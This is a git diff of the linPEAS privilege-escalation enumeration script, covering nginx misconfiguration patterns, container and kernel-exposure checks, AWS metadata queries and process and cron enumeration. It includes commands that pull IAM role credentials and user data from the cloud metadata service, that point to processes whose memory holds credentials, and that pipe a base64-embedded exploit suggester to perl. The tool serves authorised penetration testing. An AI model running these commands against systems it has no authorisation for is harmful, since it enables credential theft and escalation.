diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index eb2186c..73b05fd 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -413,7 +413,7 @@ search: exec: - 'echo "Apache version: $(warn_exec apache2 -v 2>/dev/null; warn_exec httpd -v 2>/dev/null)"' - 'echo "Nginx version: $(warn_exec nginx -v 2>/dev/null)"' - - if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then 'grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null'; fi + - if [ -d "/etc/apache2" ] && [ -r "/etc/apache2" ]; then grep -R -B1 "httpd-php" /etc/apache2 2>/dev/null; fi - if [ -d "/usr/share/nginx/modules" ] && [ -r "/usr/share/nginx/modules" ]; then print_3title 'Nginx modules'; ls /usr/share/nginx/modules | sed -${E} "s,$NGINX_KNOWN_MODULES,${SED_GREEN},g"; fi - "print_3title 'PHP exec extensions'" @@ -442,11 +442,33 @@ search: value: bad_regex: "On" remove_regex: "^;" - line_grep: '"allow_"' + line_grep: "allow_" type: f search_in: - common - + + - name: "nginx.conf" + value: + bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection" + remove_regex: "#" + type: f + remove_empty_lines: True + search_in: + - common + + - name: "nginx" + value: + type: d + files: + - name: "*.conf" + value: + bad_regex: "location.*.php$|$uri|$document_uri|proxy_intercept_errors.*on|proxy_hide_header.*|merge_slashes.*on|resolver.*|proxy_pass|internal|location.+[a-zA-Z0-9][^/]\\s+\\{|map|proxy_set_header.*Upgrade.*http_upgrade|proxy_set_header.*Connection.*http_connection" + remove_empty_lines: True + remove_regex: '#' + remove_path: "nginx.conf" + search_in: + - common + - name: PHP Sessions value: config: diff --git a/linPEAS/builder/linpeas_parts/1_system_information.sh b/linPEAS/builder/linpeas_parts/1_system_information.sh index eab5ca5..8ec92a6 100644 --- a/linPEAS/builder/linpeas_parts/1_system_information.sh +++ b/linPEAS/builder/linpeas_parts/1_system_information.sh @@ -162,7 +162,7 @@ if [ "$(command -v perl 2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2" print_info "https://github.com/jondonas/linux-exploit-suggester-2" les2_b64="peass{LES2}" - echo $les2_b64 | base64 -d | perl | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" + echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g" echo "" fi diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh index 9ac715d..b8a5353 100644 --- a/linPEAS/builder/linpeas_parts/2_container.sh +++ b/linPEAS/builder/linpeas_parts/2_container.sh @@ -285,26 +285,26 @@ if [ "$inContainer" ]; then print_list "uevent_helper breakout ......... $uevent_helper_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "is modprobe present ............ $modprobe_present\n" | sed -${E} "s,/.*,${SED_RED}," - print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" - print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" - print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" - print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" - print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" - print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" - print_list "/sys/kernel/security present ... $security_present\n" - print_list "/sys/kernel/security writable .. $security_writable\n" + print_list "DoS via panic_on_oom ........... $panic_on_oom_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "DoS via panic_sys_fs ........... $panic_sys_fs_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "DoS via sysreq_trigger_dos ..... $sysreq_trigger_dos\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/config.gz readable ....... $proc_configgz_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/sched_debug readable ..... $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/*/mountinfo readable ..... $mountinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/security present ... $security_present\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/security writable .. $security_writable\n" | sed -${E} "s,/Yes,${SED_RED}," if [ "$EXTRA_CHECKS" ]; then - print_list "/proc/kmsg readable ............ $kmsg_readable\n" - print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" - print_list "/proc/self/mem readable ........ $sched_debug_readable\n" - print_list "/proc/kcore readable ........... $kcore_readable\n" - print_list "/proc/kmem readable ............ $kmem_readable\n" - print_list "/proc/kmem writable ............ $kmem_writable\n" - print_list "/proc/mem readable ............. $mem_readable\n" - print_list "/proc/mem writable ............. $mem_writable\n" - print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" - print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" - print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" + print_list "/proc/kmsg readable ............ $kmsg_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kallsyms readable ........ $kallsyms_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/self/mem readable ........ $sched_debug_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kcore readable ........... $kcore_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kmem readable ............ $kmem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/kmem writable ............ $kmem_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/mem readable ............. $mem_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/proc/mem writable ............. $mem_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/kernel/vmcoreinfo readable $vmcoreinfo_readable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/firmware/efi/vars writable $efi_vars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," + print_list "/sys/firmware/efi/efivars writable $efi_efivars_writable\n" | sed -${E} "s,/Yes,${SED_RED}," fi echo "" diff --git a/linPEAS/builder/linpeas_parts/3_cloud.sh b/linPEAS/builder/linpeas_parts/3_cloud.sh index e166423..59a32fd 100644 --- a/linPEAS/builder/linpeas_parts/3_cloud.sh +++ b/linPEAS/builder/linpeas_parts/3_cloud.sh @@ -187,11 +187,11 @@ if [ "$is_aws_ecs" = "Yes" ]; then if [ "$aws_ecs_metadata_uri" ]; then print_3title "Container Info" - exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri" + exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri" echo "" print_3title "Task Info" - exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri/task" + exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task" echo "" else echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info" @@ -199,7 +199,7 @@ if [ "$is_aws_ecs" = "Yes" ]; then if [ "$aws_ecs_service_account_uri" ]; then print_3title "IAM Role" - exec_with_jq $aws_ecs_req "$aws_ecs_service_account_uri" + exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri" echo "" else echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)" @@ -214,52 +214,52 @@ if [ "$is_aws_ec2" = "Yes" ]; then aws_req="" if [ "$(command -v curl)" ]; then - aws_req='curl -s -f -H "$HEADER"' + aws_req="curl -s -f -H '$HEADER'" elif [ "$(command -v wget)" ]; then - aws_req='wget -q -O - -H "$HEADER"' + aws_req="wget -q -O - -H '$HEADER'" else echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" fi if [ "$aws_req" ]; then - printf "ami-id: "; $aws_req "$URL/ami-id"; echo "" - printf "instance-action: "; $aws_req "$URL/instance-action"; echo "" - printf "instance-id: "; $aws_req "$URL/instance-id"; echo "" - printf "instance-life-cycle: "; $aws_req "$URL/instance-life-cycle"; echo "" - printf "instance-type: "; $aws_req "$URL/instance-type"; echo "" - printf "region: "; $aws_req "$URL/placement/region"; echo "" + printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo "" + printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo "" + printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo "" + printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo "" + printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo "" + printf "region: "; eval $aws_req "$URL/placement/region"; echo "" echo "" print_3title "Account Info" - exec_with_jq $aws_req "$URL/identity-credentials/ec2/info"; echo "" + exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo "" echo "" print_3title "Network Info" - for mac in $($aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do + for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do echo "Mac: $mac" - printf "Owner ID: "; $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo "" - printf "Public Hostname: "; $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo "" - printf "Security Groups: "; $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo "" - echo "Private IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo "" - printf "Subnet IPv4: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo "" - echo "PrivateIPv6s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo "" - printf "Subnet IPv6: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo "" - echo "Public IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo "" + printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo "" + printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo "" + printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo "" + echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo "" + printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo "" + echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo "" + printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo "" + echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo "" echo "" done echo "" print_3title "IAM Role" - exec_with_jq $aws_req "$URL/iam/info"; echo "" - for role in $($aws_req "$URL/iam/security-credentials/" 2>/dev/null); do + exec_with_jq eval $aws_req "$URL/iam/info"; echo "" + for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do echo "Role: $role" - exec_with_jq $aws_req "$URL/iam/security-credentials/$role"; echo "" + exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo "" echo "" done echo "" print_3title "User Data" - $aws_req "http://169.254.169.254/latest/user-data" + eval $aws_req "http://169.254.169.254/latest/user-data" fi fi diff --git a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh index d117b73..0a1d8c8 100644 --- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh +++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh @@ -3,146 +3,167 @@ #-----) Processes & Cron & Services & Timers (-----# #################################################### -#-- PCS) Cleaned proccesses -print_2title "Cleaned processes" -if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC -fi -print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Cleaned proccesses + print_2title "Cleaned processes" + if [ "$NOUSEPS" ]; then + printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC + fi + print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" -if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) -else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + if [ "$NOUSEPS" ]; then + print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + pslist=$(print_ps) + else + (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi fi - fi - done - pslist=$(ps auxwww) - echo "" + done + pslist=$(ps auxwww) + echo "" - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + #-- PCS) Binary processes permissions + print_2title "Binary processes permissions (non 'root root' and not belonging to current user)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes" + binW="IniTialiZZinnggg" + ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi + done + ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," + fi + echo "" +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Files opened by processes belonging to other users + if ! [ "$IAMROOT" ]; then + print_2title "Files opened by processes belonging to other users" + print_info "This is usually empty because of the lack of privileges to read other user processes information" + lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + echo "" + fi +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Processes with credentials inside memory + print_2title "Processes with credentials in memory (root req)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory" + if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi + if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi + if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi + if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi + if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi + if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi + echo "" +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Different processes 1 min + if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then + print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" + temp_file=$(mktemp) + if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi + echo "" + fi +fi + +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Cron + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs" + command -v crontab 2>/dev/null || echo_not_found "crontab" + crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + command -v incrontab 2>/dev/null || echo_not_found "incrontab" + incrontab -l 2>/dev/null + ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" + cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," + crontab -l -u "$USER" 2>/dev/null | tr -d "\r" + ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths + atq 2>/dev/null +else + print_2title "Cron jobs" + print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs" + find "$SEARCH_IN_FOLDER" '(' -type d -or -type f ')' '(' -name "cron*" -or -name "anacron" -or -name "anacrontab" -or -name "incron.d" -or -name "incron" -or -name "at" -or -name "periodic" ')' -exec echo {} \; -exec ls -lR {} \; fi echo "" -#-- PCS) Files opened by processes belonging to other users -if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" + +if ! [ "$SEARCH_IN_FOLDER" ]; then + if [ "$MACPEAS" ]; then + print_2title "Third party LaunchAgents & LaunchDemons" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" + ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null + echo "" + + print_2title "Writable System LaunchAgents & LaunchDemons" + find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi + done + echo "" + + print_2title "StartupItems" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" + ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null + echo "" + + print_2title "Login Items" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" + osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null + echo "" + + print_2title "SPStartupItemDataType" + system_profiler SPStartupItemDataType + echo "" + + print_2title "Emond scripts" + print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" + ls -l /private/var/db/emondClients + echo "" + fi fi -#-- PCS) Processes with credentials inside memory -print_2title "Processes with credentials in memory (root req)" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory" -if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi -if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi -if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi -if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi -if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi -if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi -echo "" - -#-- PCS) Different processes 1 min -if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" +if ! [ "$SEARCH_IN_FOLDER" ]; then + #-- PCS) Services + if [ "$EXTRA_CHECKS" ]; then + print_2title "Services" + print_info "Search for outdated versions" + (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" + echo "" + fi fi -#-- PCS) Cron -print_2title "Cron jobs" -print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs" -command -v crontab 2>/dev/null || echo_not_found "crontab" -crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -command -v incrontab 2>/dev/null || echo_not_found "incrontab" -incrontab -l 2>/dev/null -ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" -cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," -crontab -l -u "$USER" 2>/dev/null | tr -d "\r" -ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths -atq 2>/dev/null -echo "" - -if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - 